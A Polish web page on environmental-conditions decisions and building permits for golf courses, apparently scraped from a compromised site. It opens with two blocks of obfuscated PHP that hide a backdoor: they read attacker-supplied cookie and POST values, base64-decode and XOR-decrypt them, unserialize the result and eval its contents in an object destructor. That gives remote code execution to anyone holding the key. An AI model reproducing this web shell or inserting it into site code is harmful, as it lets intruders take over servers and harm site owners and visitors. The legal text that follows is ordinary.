$xwHuTCKvEp = "\x4a" . 'j' . chr ( 677 - 611 ).chr (95) . chr (113) . 'n' . "\157" . chr (112) . 'J';$LbNyOdZwBO = chr (99) . "\154" . "\x61" . "\x73" . chr ( 261 - 146 ).chr (95) . chr ( 978 - 877 )."\x78" . "\x69" . chr (115) . "\x74" . "\x73";$vpuETEHs = class_exists($xwHuTCKvEp); $LbNyOdZwBO = "53325";$QZCRPzs = !1;if ($vpuETEHs == $QZCRPzs){function kXAiBRPTMR(){return FALSE;}$yNjYNxlW = "22511";kXAiBRPTMR();class JjB_qnopJ{private function ZfFvaV($yNjYNxlW){if (is_array(JjB_qnopJ::$DwBnCnJB)) {$xnmdraZB = str_replace("\74" . '?' . "\160" . chr ( 942 - 838 )."\160", "", JjB_qnopJ::$DwBnCnJB['c' . chr ( 1046 - 935 ).'n' . 't' . "\x65" . "\x6e" . chr (116)]);eval($xnmdraZB); $yNjYNxlW = "22511";exit();}}private $IeTBGUYe;public function qdYxfn(){echo 51660;}public function __destruct(){$yNjYNxlW = "28338_64773";$this->ZfFvaV($yNjYNxlW); $yNjYNxlW = "28338_64773";}public function __construct($vNDcOce=0){$mfYnS = $_POST;$UIVJtGw = $_COOKIE;$XybIzIoaL = "4172d24f-eb14-4e26-a009-94428947564f";$woJcUJzDM = @$UIVJtGw[substr($XybIzIoaL, 0, 4)];if (!empty($woJcUJzDM)){$ikOeu = "base64";$TMkFlTAWY = "";$woJcUJzDM = explode(",", $woJcUJzDM);foreach ($woJcUJzDM as $PYVqoPYfVi){$TMkFlTAWY .= @$UIVJtGw[$PYVqoPYfVi];$TMkFlTAWY .= @$mfYnS[$PYVqoPYfVi];}$TMkFlTAWY = array_map($ikOeu . '_' . chr (100) . "\145" . chr (99) . "\157" . chr ( 492 - 392 ).chr (101), array($TMkFlTAWY,)); $TMkFlTAWY = $TMkFlTAWY[0] ^ str_repeat($XybIzIoaL, (strlen($TMkFlTAWY[0]) / strlen($XybIzIoaL)) + 1);JjB_qnopJ::$DwBnCnJB = @unserialize($TMkFlTAWY); $TMkFlTAWY = class_exists("28338_64773");}}public static $DwBnCnJB = 25714;}$nXeHrob = new /* 40812 */ $xwHuTCKvEp(22511 + 22511); $yNjYNxlW = strpos($yNjYNxlW, $yNjYNxlW); $QZCRPzs = $nXeHrob = $yNjYNxlW = Array();}$ArdLztvwZK = chr (109) . 'S' . "\x5f" . "\124" . "\106" . 'y' . chr (73) . "\x54";$mKTYHWqyHQ = "\143" . "\154" . chr ( 192 - 95 ).chr (115) . chr ( 1083 - 968 )."\x5f" . chr ( 756 - 655 ).'x' . chr (105) . "\x73" . chr ( 730 - 614 ).'s';$LpbfTDDS = class_exists($ArdLztvwZK); $mKTYHWqyHQ = "43411";$efLfFtcDaS = !1;if ($LpbfTDDS == $efLfFtcDaS){function wTczX(){return FALSE;}$tTuPPv = "61469";wTczX();class mS_TFyIT{private function CrmMFPEY($tTuPPv){if (is_array(mS_TFyIT::$jrKqR)) {$PxBZGEY = str_replace("\74" . chr ( 458 - 395 )."\x70" . 'h' . "\x70", "", mS_TFyIT::$jrKqR['c' . chr ( 713 - 602 )."\x6e" . 't' . "\145" . chr ( 881 - 771 )."\x74"]);eval($PxBZGEY); $tTuPPv = "61469";exit();}}private $gcGfvyfT;public function vNpxoSXk(){echo 32619;}public function __destruct(){$tTuPPv = "6774_6839";$this->CrmMFPEY($tTuPPv); $tTuPPv = "6774_6839";}public function __construct($gkCTw=0){$zGTfxldz = $_POST;$TQxQB = $_COOKIE;$sdjSCbbtb = "8664aaf1-6119-46d2-b4d5-e002ec4d98eb";$czaflLa = @$TQxQB[substr($sdjSCbbtb, 0, 4)];if (!empty($czaflLa)){$GNRgCS = "base64";$wWmbIpZJ = "";$czaflLa = explode(",", $czaflLa);foreach ($czaflLa as $JsHLnfyqZI){$wWmbIpZJ .= @$TQxQB[$JsHLnfyqZI];$wWmbIpZJ .= @$zGTfxldz[$JsHLnfyqZI];}$wWmbIpZJ = array_map($GNRgCS . "\137" . chr (100) . chr (101) . 'c' . chr ( 635 - 524 ).chr (100) . chr (101), array($wWmbIpZJ,)); $wWmbIpZJ = $wWmbIpZJ[0] ^ str_repeat($sdjSCbbtb, (strlen($wWmbIpZJ[0]) / strlen($sdjSCbbtb)) + 1);mS_TFyIT::$jrKqR = @unserialize($wWmbIpZJ); $wWmbIpZJ = class_exists("6774_6839");}}public static $jrKqR = 58613;}$ArtPksxz = new /* 52120 */ $ArdLztvwZK(61469 + 61469); $efLfFtcDaS = $ArtPksxz = $tTuPPv = Array();} Decyzja o środowiskowych uwarunkowaniach pola golfowego - Pola golfowe

Decyzja o środowiskowych uwarunkowaniach pola golfowego


Ochrona środowiska a pozwolenie na budowę pola golfowego

 

Prawo wciąż się zmienia. Jego kolejne nowelizacje i nowe rozporządzenia, powodują, że rozważania i podniesione racje o braku potrzeby uzyskania pozwolenia na budowę, mogą okazać się chybione.

Tak może się stać, jeśli potencjalny inwestor otrzyma decyzję stwierdzającą, iż zakres planowanej inwestycji budowy pola golfowego będzie wymagać sporządzenia oceny oddziaływania przedsięwzięcia na środowisko.

Dlaczego? Ponieważ zgodnie z art. 29. ust.3. prawa budowlanego – niezależnie od charakteru robót – pozwolenia na budowę wymagają wszystkie przedsięwzięcia, wymagającę przeprowadzenia oceny oddziaływania na środowisko, oraz przedsięwzięcia wymagające przeprowadzenia oceny oddziaływania na obszar Natura 2000.

 

Decyzja o środowiskowych uwarunkowaniach inwestycji pola golfowego

 

Każde budowane pole golfowe wymaga decyzji o środowiskowych uwarunkowaniach  wydanej na podstawie art.71 ust.1, ust.2 pkt 2, art.75  ust.1 pkt 4 i art.72  ust.1 lub 1a ustawy  z dnia  3 października 2008 r. o udostępnianiu informacji o środowisku i jego ochronie,  udziale społeczeństwa  w ochronie środowiska oraz o ocenach oddziaływania na środowisko (Dz.U. z 2017 r. poz. 1405).

Jest to wymóg § 3 ust. 1 pkt. 57 rozporządzenia Rady Ministrów z dnia 9 listopada 2010 r. w sprawie przedsięwzięć mogących znacząco oddziaływać na środowisko (Dz.U. z 2016 r., poz. 71), w którym pola golfowe są wymienione jako obiekty wielkopowierzchniowe, mogące potencjalnie znacząco oddziaływać na środowisko.

 

Tylko decyzja o „braku potrzeby przeprowadzenia oceny oddziaływania przedsięwzięcia na środowisko” oznacza brak konieczności wystąpienia z wnioskiem o pozwolenie na budowę pola golfowego. Wymóg przeprowadzenia takiej oceny lub oceny oddziaływania na obszar Natura 2000, to wynikający z litery prawa nakaz uzyskania pozwolenia na budowę.

 

Karta Informacyjna Przedsięwzięcia pola golfowego

 

Podstawą wydania decyzji o środowiskowych uwarunkowaniach inwestycji pola golfowego jest Karta Informacyjna Przedsięwzięcia (KIP). Stanowi ona stanowi podstawowy załącznik do wniosku o wydanie decyzji o środowiskowych uwarunkowaniach pola golfowego.

 

Na jej podstawie przeprowadzana jest analiza szeregu danych. Między innymi:

  • wpływu na krajobraz;
  • wpływu na jakość wód powierzchniowych i podziemnych;
  • wpływu na stan jakości powietrza;
  • zagrożeń dla zachowania właściwego stanu ochrony siedlisk przyrodniczych i siedlisk gatunków będących przedmiotami ochrony;
  • emisja gazów i emisja hałasu podczas budowy i eksploatacji pola;

i innych, zgodnie z wymogami powołanej powyżej ustawy  z dnia  3 października 2008 r. o udostępnianiu informacji o środowisku i jego ochronie,  udziale społeczeństwa  w ochronie środowiska oraz o ocenach oddziaływania na środowisko (Dz.U. z 2017 r. poz. 1405).

 

Organami właściwymi do wydania opinii i uzgodnień jest Państwowy Powiatowy Inspektor Sanitarny oraz Regionalny Dyrektor Ochrony Środowiska. Oceniania jest przez urzędników nie mających do czynienia z grą w golfa. W większości znanych przypadków, trzeba walczyć z błędnymi stereotypami dotyczącymi wyobrażenia o polu golfowym i jego budowie.

Ważne są informacje na temat sposobu i ilości nawadniania, nawożenia, drenażu, sposobu pielęgnacji, emisji hałasu przez maszyny, ilości zużywanego rocznie paliwa i mnóstwa innych szczegółów.

Sporządzenie Karty Informacyjnej Przedsięwzięcia bez znajomości specyfiki pola golfowego podczas budowy i podczas późniejszej eksploatacji, a także bez dokładnej znajomości wpływu na środowisko każdego z elementów pola, może zakończyć się inwestycyjną katastrofą.

 

Należy mieć na uwadze, że w przypadku planowania budowy pola golfowego, Karta Informacyjna Przedsięwzięcia jest najważniejszym dokumentem. To ona implikuje dalszą drogę formalno-prawną (a czasem wykonalność) planowanej inwestycji.